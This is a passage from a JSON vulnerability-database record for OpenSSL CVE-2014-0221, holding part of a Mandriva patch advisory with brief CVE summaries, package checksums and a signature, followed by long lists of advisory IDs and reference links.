sensitive information,\n via a crafted TLS handshake, aka the CCS Injection vulnerability\n (CVE-2014-0224). \n \n The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n products, uses nondeterministic CBC padding, which makes it easier\n for man-in-the-middle attackers to obtain cleartext data via a\n padding-oracle attack, aka the POODLE issue (CVE-2014-3566). NOTE: this issue\n became relevant after the CVE-2014-3568 fix (CVE-2014-3569). \n \n The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before\n 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square\n of a BIGNUM value, which might make it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors,\n related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and\n crypto/bn/bn_asm.c (CVE-2014-3570). \n \n OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k\n does not enforce certain constraints on certificate data, which allows\n remote attackers to defeat a fingerprint-based certificate-blacklist\n protection mechanism by including crafted data within a\n certificate\u0026#039;s unsigned portion, related to crypto/asn1/a_verify.c,\n crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c\n (CVE-2014-8275). \n \n The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before\n 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL\n servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate\n brute-force decryption by offering a weak ephemeral RSA key in a\n noncompliant role, related to the FREAK issue. NOTE: the scope of\n this CVE is only client code based on OpenSSL, not EXPORT_RSA issues\n associated with servers or other TLS implementations (CVE-2015-0204). \n \n The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before\n 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a\n Diffie-Hellman (DH) certificate without requiring a CertificateVerify\n message, which allows remote attackers to obtain access without\n knowledge of a private key via crafted TLS Handshake Protocol traffic\n to a server that recognizes a Certification Authority with DH support\n (CVE-2015-0205). \n \n The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before\n 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not\n properly handle a lack of outer ContentInfo, which allows attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) by leveraging an application that processes arbitrary PKCS#7\n data and providing malformed data with ASN.1 encoding, related to\n crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289). \n \n The updated packages have been upgraded to the 1.0.1m version where\n these security flaws has been fixed. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\n http://openssl.org/news/secadv_20150108.txt\n http://openssl.org/news/secadv_20150319.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm\n 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm\n a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm \n 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS\nkz0ex6eI6hA6qSwklA2NoXY=\n=GYjX\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2014-0221" }, { "db": "BID", "id": "67901" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "126925" }, { "db": "PACKETSTORM", "id": "127042" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "127958" }, { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "VULMON", "id": "CVE-2014-0221" }, { "db": "PACKETSTORM", "id": "126976" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127159" }, { "db": "PACKETSTORM", "id": "127421" }, { "db": "PACKETSTORM", "id": "131044" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0221", "trust": 3.4 }, { "db": "BID", "id": "67901", "trust": 2.0 }, { "db": "MCAFEE", "id": "SB10075", "trust": 2.0 }, { "db": "SECUNIA", "id": "59659", "trust": 1.7 }, { "db": "SECUNIA", "id": "58977", "trust": 1.7 }, { "db": "SECUNIA", "id": "59310", "trust": 1.7 }, { "db": "SECUNIA", "id": "59189", "trust": 1.7 }, { "db": "SECUNIA", "id": "59721", "trust": 1.7 }, { "db": "SECUNIA", "id": "59221", "trust": 1.7 }, { "db": "SECUNIA", "id": "58337", "trust": 1.7 }, { "db": "SECUNIA", "id": "59491", "trust": 1.7 }, { "db": "SECUNIA", "id": "59300", "trust": 1.7 }, { "db": "SECUNIA", "id": "60571", "trust": 1.7 }, { "db": "SECUNIA", "id": "59287", "trust": 1.7 }, { "db": "SECUNIA", "id": "58939", "trust": 1.7 }, { "db": "SECUNIA", "id": "59162", "trust": 1.7 }, { "db": "SECUNIA", "id": "59449", "trust": 1.7 }, { "db": "SECUNIA", "id": "59364", "trust": 1.7 }, { "db": "SECUNIA", "id": "59192", "trust": 1.7 }, { "db": "SECUNIA", "id": "59990", "trust": 1.7 }, { "db": "SECUNIA", "id": "59167", "trust": 1.7 }, { "db": "SECUNIA", "id": "58945", "trust": 1.7 }, { "db": "SECUNIA", "id": "59126", "trust": 1.7 }, { "db": "SECUNIA", "id": "61254", "trust": 1.7 }, { "db": "SECUNIA", "id": "59175", "trust": 1.7 }, { "db": "SECUNIA", "id": "59655", "trust": 1.7 }, { "db": "SECUNIA", "id": "59451", "trust": 1.7 }, { "db": "SECUNIA", "id": "59429", "trust": 1.7 }, { "db": "SECUNIA", "id": "59306", "trust": 1.7 }, { "db": "SECUNIA", "id": "59518", "trust": 1.7 }, { "db": "SECUNIA", "id": "59490", "trust": 1.7 }, { "db": "SECUNIA", "id": "60687", "trust": 1.7 }, { "db": "SECUNIA", "id": "59120", "trust": 1.7 }, { "db": "SECUNIA", "id": "59666", "trust": 1.7 }, { "db": "SECUNIA", "id": "59514", "trust": 1.7 }, { "db": "SECUNIA", "id": "59784", "trust": 1.7 }, { "db": "SECUNIA", "id": "58615", "trust": 1.7 }, { "db": "SECUNIA", "id": "59460", "trust": 1.7 }, { "db": "SECUNIA", "id": "59284", "trust": 1.7 }, { "db": "SECUNIA", "id": "59495", "trust": 1.7 }, { "db": "SECUNIA", "id": "59413", "trust": 1.7 }, { "db": "SECUNIA", "id": "59027", "trust": 1.7 }, { "db": "SECUNIA", "id": "58713", "trust": 1.7 }, { "db": "SECUNIA", "id": "58714", "trust": 1.7 }, { "db": "SECUNIA", "id": "59365", "trust": 1.7 }, { "db": "SECUNIA", "id": "59441", "trust": 1.7 }, { "db": "SECUNIA", "id": "59454", "trust": 1.7 }, { "db": "SECUNIA", "id": "59450", "trust": 1.7 }, { "db": "SECUNIA", "id": "59301", "trust": 1.7 }, { "db": "SECUNIA", "id": "59895", "trust": 1.7 }, { "db": "SECUNIA", "id": "59342", "trust": 1.7 }, { "db": "SECUNIA", "id": "59669", "trust": 1.7 }, { "db": "SECUNIA", "id": "59437", "trust": 1.7 }, { "db": "SECUNIA", "id": "59528", "trust": 1.7 }, { "db": "SECTRACK", "id": "1030337", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10629", "trust": 1.7 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201406-079", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.4 }, { "db": "DLINK", "id": "SAP10045", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-0221", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127421", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127159", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127362", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127266", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127608", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126976", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131044", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140720", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127862", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127016", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127958", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128001", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127042", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126925", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0221" }, { "db": "BID", "id": "67901" }, { "db": "PACKETSTORM", "id": "127421" }, { "db": "PACKETSTORM", "id": "127159" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127608" }, { "db": "PACKETSTORM", "id": "126976" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "127958" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "127042" }, { "db": "PACKETSTORM", "id": "126925" }, { "db": "CNNVD", "id": "CNNVD-201406-079" }, { "db": "NVD", "id": "CVE-2014-0221" } ] }, "id": "VAR-201406-0142", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4065201389473685 }, "last_update_date": "2024-06-14T21:51:12.928000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "openssl-1.0.1h", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51081" }, { "title": "openssl-1.0.0m", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51080" }, { "title": "openssl-0.9.8za", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51079" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/07/10/fireeye_patches_os_torpedo_exploitdb_disclosure/" }, { "title": "Red Hat: CVE-2014-0221", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0221" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-4" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-3" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-2" }, { "title": "Debian Security Advisories: DSA-2950-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=909292f2afe623fbec51f7ab6b32f790" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=07d14df4883f21063a053cea8d2239c6" }, { "title": "Amazon Linux AMI: ALAS-2014-349", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-349" }, { "title": "Debian CVElist Bug Report Logs: virtualbox: CVE-2014-6588 CVE-2014-6589 CVE-2014-6590 CVE-2014-6595 CVE-2015-0418 CVE-2015-0427", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=eee4d8c3e2b11de5b15ee65d96af6c60" }, { "title": "Symantec Security Advisories: SA80 : OpenSSL Security Advisory 05-Jun-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=dd4667746d163d08265dfdd4c98e4201" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for OpenSSL Vulnerabilities (June 2014)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=afbd3a710e98424e558b1b21482abad6" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2014-0221 " }, { "title": "", "trust": 0.1, "url": "https://github.com/potterxma/linux-deployment-standard " }, { "title": "wormhole", "trust": 0.1, "url": "https://github.com/jumanjihouse/wormhole " }, { "title": "oval", "trust": 0.1, "url": "https://github.com/jumanjihouse/oval " }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0221" }, { "db": "CNNVD", "id": "CNNVD-201406-079" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0221" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.6, "url": "http://support.citrix.com/article/ctx140876" }, { "trust": 2.3, "url": "http://www.openssl.org/news/secadv_20140605.txt" }, { "trust": 2.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm" }, { "trust": 2.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html" }, { "trust": 2.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0006.html" }, { "trust": 2.3, "url": "http://www.securityfocus.com/bid/67901" }, { "trust": 2.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg24037783" }, { "trust": 2.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676793" }, { "trust": 2.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 2.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676226" }, { "trust": 2.0, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa80" }, { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062" }, { "trust": 2.0, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678167" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137" }, { "trust": 2.0, "url": "http://www.fortiguard.com/advisory/fg-ir-14-018/" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095757" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095756" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095755" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095754" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683332" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676879" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676071" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675821" }, { "trust": 2.0, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory9.asc" }, { "trust": 1.7, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1103593" }, { "trust": 1.7, "url": "http://www.blackberry.com/btsc/kb36051" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59301" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59450" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59491" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59721" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59655" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59659" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59162" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678289" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59120" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59528" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58939" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59666" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59126" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59490" }, { "trust": 1.7, "url": "http://www.novell.com/support/kb/doc.php?id=7015300" }, { "trust": 1.7, "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6060\u0026myns=phmc\u0026mync=e" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59514" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677527" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59495" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59669" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59413" }, { "trust": 1.7, "url": "http://www.novell.com/support/kb/doc.php?id=7015264" }, { "trust": 1.7, "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6061\u0026myns=phmc\u0026mync=e" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59300" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59895" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59342" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59451" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001843" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001841" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2014-1021.html" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59990" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59221" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60571" }, { "trust": 1.7, "url": "http://linux.oracle.com/errata/elsa-2014-1053.html" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60687" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59784" }, { "trust": 1.7, "url": "http://support.apple.com/kb/ht6443" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2014/dec/23" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140431828824371\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140499827729550\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140266410314613\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140448122410568\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140491231331543\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140621259019789\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140482916501310\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140389274407904\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140317760000786\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140904544427729\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140389355508263\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140752315422991\u0026w=2" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05301946" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00016.html" }, { "trust": 1.7, "url": "https://www.novell.com/support/kb/doc.php?id=7015271" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1030337" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:106" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:105" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201407-05.xml" }, { "trust": 1.7, "url": "http://secunia.com/advisories/61254" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59518" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59460" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59454" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59449" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59441" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59437" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59429" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59365" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59364" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59310" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59306" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59287" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59284" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59192" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59189" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59175" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59167" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59027" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58977" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58945" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58714" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58713" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58615" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58337" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 1.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=d3152655d5319ce883c8e3ac4b99f8de4c59d846" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.6, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.6, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=d3152655d5319ce883c8e3ac4b99f8de4c59d846" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://support.lenovo.com/us/en/solutions/len-24443" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05301946" }, { "trust": 0.3, "url": 